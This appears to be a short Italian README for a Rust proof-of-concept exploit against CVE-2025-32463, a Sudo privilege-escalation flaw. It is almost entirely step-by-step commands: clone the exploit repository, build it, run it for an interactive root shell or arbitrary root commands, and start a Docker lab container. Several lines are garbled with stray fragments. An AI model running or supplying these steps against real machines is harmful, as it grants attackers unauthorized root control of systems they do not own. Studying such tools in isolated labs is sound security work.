
Exploit proof-of-concept basato su Rust per CVE-2025-32463, una vulnerabilità di escalation dei privilegi in Sudo. Avvia una shell root interattiva o esegue comandi arbitrari come root.
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
./exploit
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
cargo build --release
Il binario compilato si troverà in:
./target/release/CVE-2025-32463-Chwoot-POC
Esegui il binario dell'exploit con argomenti opzionali da riga di comando:
sudo ./target/release/CVE-2025-32463-Chwoot-POC
id):sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
In alternativa, utilizza il contenitore Docker fornito per un ambiente vulnerabile isolato con tutte le dipendenze installate.
docker build -t sudo-chwoot .
sudo docker images)docker run --rm -it --privileged sudo-chwoot
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC